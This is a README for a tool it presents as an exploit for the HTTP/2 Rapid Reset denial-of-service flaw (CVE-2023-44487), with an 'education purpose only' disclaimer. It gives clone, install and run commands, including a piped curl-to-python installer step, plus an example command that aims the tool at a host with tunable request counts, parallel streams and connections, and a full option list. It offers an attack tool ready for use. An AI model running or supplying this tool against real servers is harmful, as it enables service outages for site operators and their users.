Quick exploit to test out rapid reset attack (CVE-2023-44487). Note: For education purpose only
Quick exploit to test out rapid reset attack (CVE-2023-44487). Note: For education purpose only
Clone the repository to your local machine using Git, install poetry, and run the program:
git clone https://github.com/studiogangster/CVE-2023-44487.git
cd CVE-2023-44487
# install Poetry, if you haven't already:
curl -sSL https://install.python-poetry.org | python -
# poetry install
poetry install
# Activate the virtual environment created by Poetry:
poetry shell
# Run Help
python main.py
## Example:
python main.py --host example.com --path /api --headers "Authorization: Basic dummy-token ; Custom-Header:Custom-Header-Value" --port 443 --requests_count 100 --max_streams 20 --parallel_connections 2Usage: main.py [OPTIONS]
Options:
--host TEXT Host URL [required]
--path TEXT Path on the host [required]
--headers TEXT Headers (comma-separated) [required]
--port INTEGER Port number [required]
--requests_count INTEGER Number of requests to be sent [required]
--max_streams INTEGER Maximum streams to be opened in parallel
[required]
--parallel_connections INTEGER Number of parallel connections to be made
with the server. (TCP connection)
[required]
--help Show this message and exit.